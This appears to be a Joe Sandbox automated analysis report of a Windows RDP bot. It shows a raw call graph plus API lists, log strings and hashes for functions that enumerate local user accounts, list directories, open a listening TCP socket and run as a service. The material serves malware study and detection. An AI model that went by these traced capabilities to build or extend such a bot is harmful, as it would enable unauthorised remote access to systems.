7ffdac12bc0e 8 API calls 63587->63642 63591 7ffdac12689b 2 API calls 63588->63591 63594 7ffdac12c20f 63591->63594 63592 7ffdac12bf3d 63637 7ffdac129370 58 API calls 63592->63637 63593->63544 63593->63582 63641 7ffdac1261a2 13 API calls 63594->63641 63598 7ffdac12bfa9 63599 7ffdac12bfd0 63598->63599 63638 7ffdac121290 7 API calls 63598->63638 63600 7ffdac12c000 63599->63600 63601 7ffdac12bfe9 GetProcessHeap HeapFree 63599->63601 63639 7ffdac1261a2 13 API calls 63600->63639 63601->63600 63605 7ffdac1268b1 QueryPerformanceFrequency QueryPerformanceCounter 63604->63605 63606 7ffdac1268a6 63604->63606 63605->63606 63606->63549 63606->63551 63608 7ffdac12b920 63607->63608 63612 7ffdac12b93d 63607->63612 63608->63612 63643 7ffdac12b482 63608->63643 63609 7ffdac1214c5 10 API calls 63611 7ffdac12b954 63609->63611 63611->63544 63612->63609 63612->63611 63614 7ffdac12ba08 63613->63614 63617 7ffdac12bb8c 63613->63617 63616 7ffdac12ba2d 63614->63616 63614->63617 63615 7ffdac12ba66 63615->63544 63618 7ffdac12ba37 63616->63618 63619 7ffdac12ba89 63616->63619 63617->63615 63620 7ffdac12175c 27 API calls 63617->63620 63622 7ffdac12bb10 63618->63622 63623 7ffdac12ba44 63618->63623 63688 7ffdac12b501 63619->63688 63621 7ffdac12bbc3 63620->63621 63621->63615 63628 7ffdac12689b 2 API calls 63621->63628 63727 7ffdac12b30e 48 API calls 63622->63727 63623->63615 63726 7ffdac12b800 68 API calls 63623->63726 63627 7ffdac12bb1c 63627->63615 63632 7ffdac12689b 2 API calls 63627->63632 63628->63615 63630 7ffdac12ba5e 63630->63615 63633 7ffdac12689b 2 API calls 63630->63633 63631 7ffdac12689b 2 API calls 63631->63615 63632->63615 63633->63615 63634->63564 63635->63585 63636->63592 63637->63598 63638->63599 63639->63568 63640->63577 63641->63544 63642->63593 63644 7ffdac12b49e 63643->63644 63645 7ffdac12b490 63643->63645 63644->63612 63651 7ffdac12b456 63645->63651 63650 7ffdac1214c5 10 API calls 63650->63644 63652 7ffdac12b463 63651->63652 63653 7ffdac12b46d 63651->63653 63652->63653 63654 7ffdac1214c5 10 API calls 63652->63654 63653->63644 63655 7ffdac12afb0 63653->63655 63654->63653 63657 7ffdac12afdf 63655->63657 63656 7ffdac12eaa0 fputc 63656->63657 63657->63656 63658 7ffdac12b044 63657->63658 63660 7ffdac12aff3 GetProcessHeap HeapReAlloc 63657->63660 63661 7ffdac12b0a1 GetProcessHeap HeapAlloc 63657->63661 63659 7ffdac1277a2 6 API calls 63658->63659 63662 7ffdac12b05a strlen 63659->63662 63660->63657 63664 7ffdac12b0dd 63660->63664 63661->63657 63663 7ffdac12b0c5 63661->63663 63674 7ffdac12af98 63662->63674 63666 7ffdac1277a2 6 API calls 63663->63666 63667 7ffdac1277a2 6 API calls 63664->63667 63669 7ffdac12b0db 63666->63669 63670 7ffdac12b0f3 63667->63670 63672 7ffdac12b10f 63669->63672 63670->63672 63673 7ffdac12b0f8 GetProcessHeap HeapFree 63670->63673 63671 7ffdac12b080 GetProcessHeap HeapFree 63671->63672 63672->63650 63673->63672 63677 7ffdac121cbd 63674->63677 63678 7ffdac121ce8 63677->63678 63679 7ffdac121d6c 63677->63679 63678->63679 63680 7ffdac121ced 63678->63680 63681 7ffdac1277a2 6 API calls 63679->63681 63682 7ffdac121cf6 send 63680->63682 63686 7ffdac121d39 63680->63686 63684 7ffdac121d40 63681->63684 63682->63680 63683 7ffdac121d1a WSAGetLastError 63682->63683 63685 7ffdac1277a2 6 API calls 63683->63685 63684->63671 63684->63672 63685->63686 63686->63684 63687 7ffdac1277a2 6 API calls 63686->63687 63687->63684 63689 7ffdac12b536 63688->63689 63690 7ffdac12b7c0 63688->63690 63691 7ffdac12b5a5 63689->63691 63692 7ffdac12b591 strlen 63689->63692 63690->63615 63690->63631 63728 7ffdac12275a 63691->63728 63692->63691 63713 7ffdac12b673 63692->63713 63696 7ffdac12b482 21 API calls 63696->63690 63698 7ffdac12afb0 17 API calls 63699 7ffdac12b614 63698->63699 63699->63713 63737 7ffdac12b217 63699->63737 63703 7ffdac12b659 63704 7ffdac12b65d 63703->63704 63745 7ffdac12ab26 strcmp 63703->63745 63704->63713 63713->63690 63713->63696 63726->63630 63727->63627 63729 7ffdac1227b2 63728->63729 63730 7ffdac122776 63728->63730 63732 7ffdac12b2da 63729->63732 63730->63729 63750 7ffdac12273a rand_s 63730->63750 63751 7ffdac12af6a 63732->63751 63735 7ffdac12b2ff 63735->63698 63735->63713 63777 7ffdac12b132 63737->63777 63740 7ffdac12b23c 63740->63713 63743 7ffdac12aa20 strcmp strcmp strcmp strcmp 63740->63743 63741 7ffdac12b232 63786 7ffdac12ad36 25 API calls 63741->63786 63743->63703 63750->63730 63752 7ffdac12175c 27 API calls 63751->63752 63753 7ffdac12af77 63752->63753 63755 7ffdac12af80 63753->63755 63770 7ffdac121596 setsockopt 63753->63770 63755->63735 63756 7ffdac12b24b 63755->63756 63757 7ffdac12afb0 17 API calls 63756->63757 63758 7ffdac12b260 63757->63758 63759 7ffdac12b2a9 63758->63759 63760 7ffdac12b217 29 API calls 63758->63760 63762 7ffdac1214c5 10 API calls 63759->63762 63761 7ffdac12b26c 63760->63761 63774 7ffdac12aa20 strcmp strcmp strcmp strcmp 63761->63774 63764 7ffdac12b2b6 63762->63764 63766 7ffdac12b2a4 63764->63766 63776 7ffdac12ab8d 6 API calls 63764->63776 63765 7ffdac12b298 63765->63759 63767 7ffdac12b29c 63765->63767 63766->63735 63775 7ffdac12ab8d 6 API calls 63767->63775 63771 7ffdac1215d5 WSAGetLastError 63770->63771 63772 7ffdac1215cb 63770->63772 63773 7ffdac1277a2 6 API calls 63771->63773 63772->63755 63773->63772 63774->63765 63775->63766 63776->63766 63778 7ffdac12b172 63777->63778 63779 7ffdac12b15a 63777->63779 63778->63740 63778->63741 63779->63778 63780 7ffdac12b163 memset 63779->63780 63781 7ffdac12b17c 63780->63781 63781->63778 63783 7ffdac12b1aa strchr 63781->63783 63787 7ffdac12b124 63781->63787 63783->63781 63784 7ffdac12b1c1 63783->63784 63786->63740 63788 7ffdac121c0a 8 API calls 63787->63788 63791 7ffdac121499 WSAGetLastError 63790->63791 63792 7ffdac12147b 63790->63792 63793 7ffdac1214a6 63791->63793 63796 7ffdac121491 closesocket 63791->63796 63794 7ffdac1277a2 6 API calls 63792->63794 63795 7ffdac1277a2 6 API calls 63793->63795 63794->63796 63795->63796 63796->63514 63796->63515 63797 7ffda5ba3553 63815 7ffda5ba3563 63797->63815 63798 7ffda5ba376e 63799 7ffda5ba3774 63798->63799 63877 7ffda5ba2785 20 API calls 63798->63877 63803 7ffda5ba3593 Sleep 63803->63815 63804 7ffda5ba2072 16 API calls 63804->63815 63808 7ffda5ba363e GetProcessHeap HeapAlloc 63809 7ffda5ba3664 CreateThread 63808->63809 63808->63815 63810 7ffda5ba3721 GetLastError 63809->63810 63811 7ffda5ba36a3 EnterCriticalSection 63809->63811 63813 7ffda5ba2072 16 API calls 63810->63813 63812 7ffda5ba36c3 63811->63812 63812->63812 63814 7ffda5ba36ca LeaveCriticalSection 63812->63814 63813->63815 63816 7ffda5ba2072 16 API calls 63814->63816 63815->63798 63815->63803 63815->63804 63815->63808 63817 7ffda5ba2785 20 API calls 63815->63817 63818 7ffda5ba3752 GetProcessHeap HeapFree 63815->63818 63819 7ffda5ba28ba socket 63815->63819 63837 7ffda5ba26b9 63815->63837 63843 7ffda5ba2604 setsockopt 63815->63843 63850 7ffda5ba2c99 63815->63850 63873 7ffda5ba27ea setsockopt 63815->63873 63816->63815 63817->63815 63818->63815 63820 7ffda5ba28eb 63819->63820 63821 7ffda5ba29c2 WSAGetLastError 63819->63821 63823 7ffda5ba27ea 18 API calls 63820->63823 63822 7ffda5ba2072 16 API calls 63821->63822 63825 7ffda5ba29e6 63822->63825 63824 7ffda5ba28f8 63823->63824 63827 7ffda5ba29b1 63824->63827 63828 7ffda5ba2901 htonl htons bind 63824->63828 63826 7ffda5ba29b9 63825->63826 63829 7ffda5ba2072 16 API calls 63825->63829 63826->63815 63878 7ffda5ba2785 20 API calls 63827->63878 63830 7ffda5ba2941 listen 63828->63830 63831 7ffda5ba2984 WSAGetLastError 63828->63831 63829->63826 63830->63825 63833 7ffda5ba295a WSAGetLastError 63830->63833 63834 7ffda5ba2072 16 API calls 63831->63834 63835 7ffda5ba2072 16 API calls 63833->63835 63836 7ffda5ba2982 63834->63836 63835->63836 63836->63825 63836->63827 63838 7ffda5ba26c9 ioctlsocket 63837->63838 63840 7ffda5ba26ec 63838->63840 63841 7ffda5ba26fd WSAGetLastError 63838->63841 63840->63815 63842 7ffda5ba2072 16 API calls 63841->63842 63842->63840 63844 7ffda5ba2639 setsockopt 63843->63844 63845 7ffda5ba2694 WSAGetLastError 63843->63845 63847 7ffda5ba2665 63844->63847 63848 7ffda5ba266f WSAGetLastError 63844->63848 63846 7ffda5ba2072 16 API calls 63845->63846 63846->63847 63847->63815 63849 7ffda5ba2072 16 API calls 63848->63849 63849->63847 63851 7ffda5ba2d58 accept 63850->63851 63852 7ffda5ba2cc4 63850->63852 63854 7ffda5ba2e9a WSAGetLastError 63851->63854 63855 7ffda5ba2d7e 63851->63855 63853 7ffda5ba26b9 18 API calls 63852->63853 63856 7ffda5ba2cce 63853->63856 63857 7ffda5ba2072 16 API calls 63854->63857 63858 7ffda5ba26b9 18 API calls 63855->63858 63859 7ffda5ba2cee select 63856->63859 63867 7ffda5ba2cd3 63856->63867 63857->63867 63860 7ffda5ba2d8b 63858->63860 63861 7ffda5ba2e29 63859->63861 63862 7ffda5ba2d52 63859->63862 63863 7ffda5ba2e86 63860->63863 63864 7ffda5ba2d94 htonl htons 63860->63864 63868 7ffda5ba2072 16 API calls 63861->63868 63862->63851 63866 7ffda5ba2e53 WSAGetLastError 63862->63866 63879 7ffda5ba2785 20 API calls 63863->63879 63871 7ffda5ba2db7 63864->63871 63870 7ffda5ba2072 16 API calls 63866->63870 63867->63815 63868->63867 63870->63867 63872 7ffda5ba2072 16 API calls 63871->63872 63872->63867 63874 7ffda5ba2827 63873->63874 63875 7ffda5ba2831 WSAGetLastError 63873->63875 63874->63815 63876 7ffda5ba2072 16 API calls 63875->63876 63876->63874 63877->63799 63878->63826 63879->63867

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 799 7ffda5576da3-7ffda5576db9 call 7ffda55740d2 802 7ffda557722a-7ffda557722e 799->802 803 7ffda5577234-7ffda5577252 GetProcessHeap HeapAlloc 802->803 804 7ffda5576dbe 802->804 805 7ffda5576dc3-7ffda5576dc8 803->805 806 7ffda5577258-7ffda557726e call 7ffda55740d2 803->806 804->805 807 7ffda5576eb4-7ffda5576eb9 805->807 808 7ffda5576dce-7ffda5576dde LocalAlloc 805->808 806->805 810 7ffda5576de2-7ffda5576de7 807->810 808->810 812 7ffda5576ded-7ffda5576e6b wcsncpy call 7ffda55793ef LookupAccountNameW 810->812 813 7ffda55771a5 810->813 820 7ffda5576e6d-7ffda5576e6f 812->820 821 7ffda5576ebe-7ffda5576eca GetLastError 812->821 815 7ffda55771aa-7ffda55771b5 813->815 816 7ffda5577273 815->816 817 7ffda55771bb-7ffda55771bd 815->817 822 7ffda5577279-7ffda5577281 816->822 817->816 819 7ffda55771c3-7ffda5577224 wcslen GetProcessHeap HeapAlloc 817->819 819->799 819->802 823 7ffda5577070-7ffda5577088 ConvertSidToStringSidA 820->823 824 7ffda5576e75-7ffda5576e96 GetLastError call 7ffda55740d2 820->824 827 7ffda5576ee1-7ffda5576ef9 LocalAlloc 821->827 828 7ffda5576ecc-7ffda5576edf call 7ffda55740d2 821->828 825 7ffda5577283 NetApiBufferFree 822->825 826 7ffda5577288-7ffda5577298 822->826 830 7ffda55770c1-7ffda55770e5 GetLastError call 7ffda55740d2 823->830 831 7ffda557708a-7ffda5577091 823->831 852 7ffda5576e9c 824->852 853 7ffda55770e7-7ffda55770ed 824->853 825->826 835 7ffda55773c3-7ffda55773ca 826->835 836 7ffda557729e-7ffda55772a0 826->836 832 7ffda5576eff-7ffda5576f31 LookupAccountNameW 827->832 833 7ffda5577066 827->833 828->824 830->831 838 7ffda557716d-7ffda5577172 831->838 839 7ffda5577097-7ffda55770bc call 7ffda55740d2 831->839 840 7ffda5576f33-7ffda5576f3c LocalFree 832->840 841 7ffda5576f41-7ffda5576f62 GetLastError call 7ffda55740d2 832->841 833->823 843 7ffda55773cc-7ffda55773ce 835->843 844 7ffda5577409-7ffda5577422 call 7ffda55740d2 835->844 836->835 846 7ffda55772a6-7ffda5577310 NetUserEnum 836->846 838->815 839->815 840->820 868 7ffda5576f64 841->868 869 7ffda5576f7c-7ffda5576f82 841->869 850 7ffda55773d4-7ffda55773f1 call 7ffda5576c7f call 7ffda55740d2 843->850 851 7ffda557751a-7ffda5577534 call 7ffda55740d2 843->851 866 7ffda5577443-7ffda5577449 844->866 867 7ffda5577424 844->867 846->822 854 7ffda5577316-7ffda557731c 846->854 892 7ffda55773f6-7ffda5577408 850->892 851->892 863 7ffda5576ea2-7ffda5576eaf 852->863 864 7ffda5577166-7ffda557716b 852->864 860 7ffda55770f3-7ffda55770f9 853->860 861 7ffda557717b-7ffda5577180 853->861 854->822 865 7ffda5577322-7ffda5577356 GetProcessHeap HeapAlloc 854->865 871 7ffda55770fb-7ffda5577101 860->871 872 7ffda5577125-7ffda5577128 860->872 861->815 863->807 864->815 874 7ffda5576d83-7ffda5576d9e call 7ffda55740d2 865->874 875 7ffda557735c-7ffda5577366 865->875 882 7ffda55774d2 866->882 883 7ffda557744f 866->883 880 7ffda557742a-7ffda5577437 867->880 881 7ffda55774c8-7ffda55774cd 867->881 884 7ffda5576f6a-7ffda5576f77 868->884 885 7ffda5577016-7ffda557701b 868->885 886 7ffda557702a-7ffda557702f 869->886 887 7ffda5576f88-7ffda5576f8e 869->887 889 7ffda5577197-7ffda557719c 871->889 890 7ffda5577107-7ffda557710d 871->890 876 7ffda557713b-7ffda5577141 872->876 877 7ffda557712a-7ffda557712d 872->877 874->822 878 7ffda55773a1-7ffda55773be 875->878 879 7ffda5577368-7ffda557739b memcpy GetProcessHeap HeapFree 875->879 902 7ffda5577143-7ffda5577148 876->902 903 7ffda5577190-7ffda5577195 876->903 900 7ffda5577182-7ffda5577187 877->900 901 7ffda557712f-7ffda5577132 877->901 879->878 880->866 881->850 914 7ffda55774dc-7ffda55774e1 882->914 893 7ffda5577451-7ffda5577457 883->893 894 7ffda557747f-7ffda5577482 883->894 884->869 885->840 886->840 895 7ffda5576fc4-7ffda5576fca 887->895 896 7ffda5576f90-7ffda5576f93 887->896 889->815 897 7ffda5577113-7ffda5577119 890->897 898 7ffda557719e-7ffda55771a3 890->898 904 7ffda557745d-7ffda5577463 893->904 905 7ffda55774fa-7ffda55774ff 893->905 906 7ffda5577484-7ffda5577487 894->906 907 7ffda5577498-7ffda557749e 894->907 915 7ffda5577052-7ffda5577057 895->915 916 7ffda5576fd0-7ffda5576fd6 895->916 908 7ffda5576fae-7ffda5576fb4 896->908 909 7ffda5576f95-7ffda5576f98 896->909 910 7ffda557711b-7ffda5577120 897->910 911 7ffda557714a-7ffda557714f 897->911 898->815 900->815 912 7ffda5577134-7ffda5577139 901->912 913 7ffda5577189-7ffda557718e 901->913 902->815 903->815 917 7ffda5577504-7ffda5577509 904->917 918 7ffda5577469-7ffda557746f 904->918 905->850 906->914 919 7ffda5577489-7ffda557748c 906->919 920 7ffda55774f0 907->920 921 7ffda55774a0-7ffda55774a5 907->921 924 7ffda5576fba-7ffda5576fbf 908->924 925 7ffda5577048-7ffda557704d 908->925 922 7ffda5577034-7ffda5577039 909->922 923 7ffda5576f9e-7ffda5576fa1 909->923 910->815 911->815 912->815 913->815 914->850 915->840 926 7ffda557705c-7ffda5577061 916->926 927 7ffda5576fdc-7ffda5576fe2 916->927 917->850 928 7ffda557750e-7ffda5577513 918->928 929 7ffda5577475-7ffda557747a 918->929 930 7ffda557748e-7ffda5577493 919->930 931 7ffda55774e6-7ffda55774eb 919->931 920->905 921->850 922->840 932 7ffda557703e-7ffda5577043 923->932 933 7ffda5576fa7-7ffda5576fac 923->933 924->840 925->840 926->840 934 7ffda5576fe4-7ffda5576fe9 927->934 935 7ffda5576fee-7ffda5576ff3 927->935 928->850 929->850 930->850 931->850 932->840 933->840 934->840 935->840
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                                      • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                                      • API String ID: 3624467404-104752423
                                                      • Opcode ID: 5d979e8033afa08c63d6ca72cd96b038feaa2c773d23a315cb30481733547519
                                                      • Instruction ID: 0f80841b7ccf90a770420a4707d7504c0522baacada75bf7d6db31a08332308d
                                                      • Opcode Fuzzy Hash: 5d979e8033afa08c63d6ca72cd96b038feaa2c773d23a315cb30481733547519
                                                      • Instruction Fuzzy Hash: BFF1B02AB1EA4B86FB228F54E46437923A1EF86F44F550832D94E47396DF3CE845C748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                      • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                      • API String ID: 4253334766-1535167640
                                                      • Opcode ID: c09bae0e17e4715884aad229713af89dbee22181e22ac985b1ea5e86cae568b0
                                                      • Instruction ID: 66d9ac2b97f1569a036576d339e1e623c20be7a6b91b45fbcdedb7f5e14d93fb
                                                      • Opcode Fuzzy Hash: c09bae0e17e4715884aad229713af89dbee22181e22ac985b1ea5e86cae568b0
                                                      • Instruction Fuzzy Hash: 8161496BF0F58BC2FA32EE14A4243B82251AF27B55F840172D91E4A3D6DE6CAD458349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                                      • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                      • API String ID: 1094913617-1535167640
                                                      • Opcode ID: 74059f7eb4c35c2106d21157995027659ccac9b204c2b1dae819d18839ee3c94
                                                      • Instruction ID: 2d3461598ba168306475b363f5733dc0b40cd982031ac0b6ee4e6765b695e5a3
                                                      • Opcode Fuzzy Hash: 74059f7eb4c35c2106d21157995027659ccac9b204c2b1dae819d18839ee3c94
                                                      • Instruction Fuzzy Hash: FC6149A5E0C69385FA607B95BC44BBCE2506F08398FC40132D99F5B2D9DF3CA88593A5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
                                                      • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                                      • API String ID: 1987963910-3382179125
                                                      • Opcode ID: 198e3a458fd7efd0016722dae70821c50ccfb0e07ceb64b37177c67457a14052
                                                      • Instruction ID: 584e8cc4640987761815bddfb6ade7339d6541a4b6b987065962831efb6ac2c4
                                                      • Opcode Fuzzy Hash: 198e3a458fd7efd0016722dae70821c50ccfb0e07ceb64b37177c67457a14052
                                                      • Instruction Fuzzy Hash: 3A61D229B1E24F82FA229F54F8603782691AF83F54F240871DD4D07792EF7DE8858709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                      • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                      • API String ID: 3590747132-3524496754
                                                      • Opcode ID: 3779f479cd93ec59d119e7f6f5f81b68c2f83b1fc2c506983fb18d39a0dbf78a
                                                      • Instruction ID: a9865576c5dc54be7c65ed72e5ec8e6f27b2454e67802af28d2019e9aa8b6e0b
                                                      • Opcode Fuzzy Hash: 3779f479cd93ec59d119e7f6f5f81b68c2f83b1fc2c506983fb18d39a0dbf78a
                                                      • Instruction Fuzzy Hash: FD31A520F0A60E87EA205B25A820376B290BF46FB6F455735EA7E037D6DE7DD5058708
                                                      APIs
                                                      • strcmp.MSVCRT ref: 00007FF70CAD1DD4
                                                      • strcmp.MSVCRT ref: 00007FF70CAD1DE7
                                                      • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF70CAD1E23
                                                      • _read.MSVCRT ref: 00007FF70CAD1E79
                                                      • GetLastError.KERNEL32 ref: 00007FF70CAD1E98
                                                        • Part of subcall function 00007FF70CAD1A63: FreeLibrary.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AA1
                                                        • Part of subcall function 00007FF70CAD1A63: GetProcessHeap.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AD4
                                                        • Part of subcall function 00007FF70CAD1A63: HeapFree.KERNEL32(?,?,00000000,0000021B15D113D0,00007FF70CAD1E50,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508), ref: 00007FF70CAD1AE5
                                                        • Part of subcall function 00007FF70CAD1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF70CAD1E55,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508,00000000), ref: 00007FF70CAD1B4D
                                                        • Part of subcall function 00007FF70CAD1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF70CAD1E55,?,?,?,?,?,?,00000001,00007FF70CAD1FC3,?,?,00007FF70CAE8508,00000000), ref: 00007FF70CAD1B5E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                                      • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                                      • API String ID: 3617873859-308889057
                                                      • Opcode ID: d9c14cef5bc04db407ce3d4bf2b8283933a1c6e06a4df5d9ff74598ea4119d63
                                                      • Instruction ID: 1c3118e7dbc9a043800bcbdea3811b351580107aea0254b95a93385bc7e241be
                                                      • Opcode Fuzzy Hash: d9c14cef5bc04db407ce3d4bf2b8283933a1c6e06a4df5d9ff74598ea4119d63
                                                      • Instruction Fuzzy Hash: 6C5107D4E0C64385FB607754FC80BBDA2A19F08368FD40532EB4F4629AEF5DE9859272
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
